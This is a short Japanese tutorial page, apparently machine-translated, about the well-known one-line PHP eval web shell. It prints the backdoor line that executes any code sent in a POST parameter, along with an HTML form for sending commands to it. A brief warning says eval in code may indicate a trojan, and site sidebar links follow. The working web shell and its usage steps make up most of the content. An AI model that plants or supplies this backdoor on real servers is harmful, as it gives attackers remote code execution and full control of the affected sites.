php eval function用の一文トロイの木馬コード_PHPチュートリアル
Jul 13, 2016 am 09:53 AMphp eval 関数の 1 文のトロイの木馬コード
これは、PHP の一般的な 1 文のトロイの木馬のソース コードです。このトロイの木馬は、PHP に従って文字列を計算します。コード。文字列は有効な PHP コードである必要があり、セミコロンで終わる必要があります。コード文字列内で return ステートメントが呼び出されない場合は、NULL が返されます。コードに解析エラーがある場合、eval() 関数は false を返します。
eval は他の PHP コードを実行するために使用できるため、コード内に eval 関数が見つかった場合は、トロイの木馬である可能性があるので注意してください
この一文だけで人が死ぬ可能性があり、誰でもどんな文書でも投稿できるので注意してください
?
1 |
<?php @eval($_POST['c']);?> |
使用方法も非常に簡単で、ローカルの投稿ファイルを送信ファイルに指すと、中のphpコードが実行されます
?
1 2 3 4 5 6 7 8 |
<html> <form action="a.php" method="post"> <input type="text" name="c" value="phpinfo();"> <input type="submit" value="submit"> </form> </ボディ> </html> |
以上がこの記事の全内容ですが、皆さんに気に入っていただければ幸いです。

人気の記事

人気の記事

ホットな記事タグ

メモ帳++7.3.1
使いやすく無料のコードエディター

SublimeText3 中国語版
中国語版、とても使いやすい

ゼンドスタジオ 13.0.1
強力な PHP 統合開発環境

ドリームウィーバー CS6
ビジュアル Web 開発ツール

SublimeText3 Mac版
神レベルのコード編集ソフト(SublimeText3)

ホットトピック











Ubuntu および Debian 用の PHP 8.4 インストールおよびアップグレード ガイド

PHP 開発用に Visual Studio Code (VS Code) をセットアップする方法
